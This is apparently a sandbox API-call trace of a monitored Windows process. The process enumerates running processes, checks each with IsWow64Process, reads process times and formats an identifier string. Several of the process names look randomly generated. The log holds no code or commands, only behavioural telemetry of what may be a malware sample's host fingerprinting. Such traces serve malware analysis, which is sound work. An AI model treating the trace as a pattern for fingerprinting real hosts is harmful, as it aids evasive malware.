	[0126.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.497] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.497] CloseHandle (hObject=0x2dc) returned 1
	[0126.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0126.497] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.497] CloseHandle (hObject=0x2dc) returned 1
	[0126.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.498] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.498] CloseHandle (hObject=0x2dc) returned 1
	[0126.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0126.498] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.498] CloseHandle (hObject=0x2dc) returned 1
	[0126.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0126.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0126.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.543] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.543] CloseHandle (hObject=0x2dc) returned 1
	[0126.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0126.544] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.544] CloseHandle (hObject=0x2dc) returned 1
	[0126.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d128, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0126.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.544] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.545] CloseHandle (hObject=0x2dc) returned 1
	[0126.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.545] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.545] CloseHandle (hObject=0x2dc) returned 1
	[0126.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.545] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.545] CloseHandle (hObject=0x2dc) returned 1
	[0126.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5c10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.546] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.546] CloseHandle (hObject=0x2dc) returned 1
	[0126.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0126.546] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.546] CloseHandle (hObject=0x2dc) returned 1
	[0126.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.547] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.547] CloseHandle (hObject=0x2dc) returned 1
	[0126.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5b38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.547] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.547] CloseHandle (hObject=0x2dc) returned 1
	[0126.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.548] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.548] CloseHandle (hObject=0x2dc) returned 1
	[0126.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.548] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.548] CloseHandle (hObject=0x2dc) returned 1
	[0126.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.548] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.548] CloseHandle (hObject=0x2dc) returned 1
	[0126.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d5f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.549] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.549] CloseHandle (hObject=0x2dc) returned 1
	[0126.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0126.549] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.549] CloseHandle (hObject=0x2dc) returned 1
	[0126.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b98c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0126.550] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.550] CloseHandle (hObject=0x2dc) returned 1
	[0126.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.550] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.550] CloseHandle (hObject=0x2dc) returned 1
	[0126.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.550] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.551] CloseHandle (hObject=0x2dc) returned 1
	[0126.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.551] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.551] CloseHandle (hObject=0x2dc) returned 1
	[0126.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0126.551] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.551] CloseHandle (hObject=0x2dc) returned 1
	[0126.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d1a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.552] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.552] CloseHandle (hObject=0x2dc) returned 1
	[0126.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5a48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.552] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.552] CloseHandle (hObject=0x2dc) returned 1
	[0126.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.552] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.552] CloseHandle (hObject=0x2dc) returned 1
	[0126.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9af0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0126.553] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.553] CloseHandle (hObject=0x2dc) returned 1
	[0126.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.553] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.553] CloseHandle (hObject=0x2dc) returned 1
	[0126.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0126.554] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.554] CloseHandle (hObject=0x2dc) returned 1
	[0126.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0126.554] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.554] CloseHandle (hObject=0x2dc) returned 1
	[0126.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b59e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.554] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.554] CloseHandle (hObject=0x2dc) returned 1
	[0126.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d1a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0126.555] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.555] CloseHandle (hObject=0x2dc) returned 1
	[0126.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9af0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0126.555] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.555] CloseHandle (hObject=0x2dc) returned 1
	[0126.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0126.556] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.556] CloseHandle (hObject=0x2dc) returned 1
	[0126.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.556] GetLastError () returned 0x5
	[0126.556] GetLastError () returned 0x5
	[0126.556] GetLastError () returned 0x5
	[0126.556] GetLastError () returned 0x5
	[0126.556] GetLastError () returned 0x5
	[0126.556] GetLastError () returned 0x5
	[0126.556] GetLastError () returned 0x5
	[0126.556] GetLastError () returned 0x5
	[0126.556] GetLastError () returned 0x5
	[0126.556] GetLastError () returned 0x5
	[0126.556] GetLastError () returned 0x5
	[0126.556] GetLastError () returned 0x5
	[0126.556] GetLastError () returned 0x5
	[0126.556] GetLastError () returned 0x5
	[0126.556] GetLastError () returned 0x5
	[0126.556] GetLastError () returned 0x5
	[0126.556] GetLastError () returned 0x5
	[0126.556] GetLastError () returned 0x5
	[0126.556] GetLastError () returned 0x5
	[0126.556] GetLastError () returned 0x5
	[0126.556] GetLastError () returned 0x5
	[0126.556] GetLastError () returned 0x5
	[0126.556] GetLastError () returned 0x5
	[0126.556] GetLastError () returned 0x5
	[0126.556] GetLastError () returned 0x5
	[0126.556] GetLastError () returned 0x5
	[0126.556] GetLastError () returned 0x5
	[0126.556] GetLastError () returned 0x5
	[0126.556] GetLastError () returned 0x5
	[0126.557] GetLastError () returned 0x5
	[0126.557] GetLastError () returned 0x5
	[0126.557] GetLastError () returned 0x5
	[0126.557] GetLastError () returned 0x5
	[0126.557] GetLastError () returned 0x5
	[0126.557] GetLastError () returned 0x5
	[0126.557] GetLastError () returned 0x5
	[0126.557] GetLastError () returned 0x5
	[0126.557] GetLastError () returned 0x5
	[0126.557] GetLastError () returned 0x5
	[0126.557] GetLastError () returned 0x5
	[0126.557] GetLastError () returned 0x5
	[0126.557] GetLastError () returned 0x5
	[0126.557] GetLastError () returned 0x5
	[0126.557] GetLastError () returned 0x5
	[0126.557] GetLastError () returned 0x5
	[0126.557] GetLastError () returned 0x5
	[0126.557] GetLastError () returned 0x5
	[0126.557] GetLastError () returned 0x5
	[0126.557] GetLastError () returned 0x5
	[0126.557] GetLastError () returned 0x5
	[0126.557] GetLastError () returned 0x5
	[0126.557] GetLastError () returned 0x5
	[0126.557] GetLastError () returned 0x5
	[0126.557] GetLastError () returned 0x5
	[0126.557] GetLastError () returned 0x5
	[0126.557] GetLastError () returned 0x5
	[0126.557] GetLastError () returned 0x5
	[0126.557] GetLastError () returned 0x5
	[0126.558] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.558] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0126.558] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0126.558] GetLastError () returned 0x5
	[0126.558] GetLastError () returned 0x5
	[0126.558] GetLastError () returned 0x5
	[0126.558] GetLastError () returned 0x5
	[0126.558] GetLastError () returned 0x5
	[0126.558] GetLastError () returned 0x5
	[0126.558] GetLastError () returned 0x5
	[0126.558] GetLastError () returned 0x5
	[0126.558] GetLastError () returned 0x5
	[0126.558] GetLastError () returned 0x5
	[0126.558] GetLastError () returned 0x5
	[0126.558] GetLastError () returned 0x5
	[0126.558] GetLastError () returned 0x5
	[0126.558] GetLastError () returned 0x5
	[0126.558] GetLastError () returned 0x5
	[0126.558] GetLastError () returned 0x5
	[0126.558] GetLastError () returned 0x5
	[0126.558] GetLastError () returned 0x5
	[0126.558] GetLastError () returned 0x5
	[0126.558] GetLastError () returned 0x5
	[0126.558] GetLastError () returned 0x5
	[0126.558] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
	[0126.559] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0126.559] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
	[0126.559] GetLastError () returned 0x5
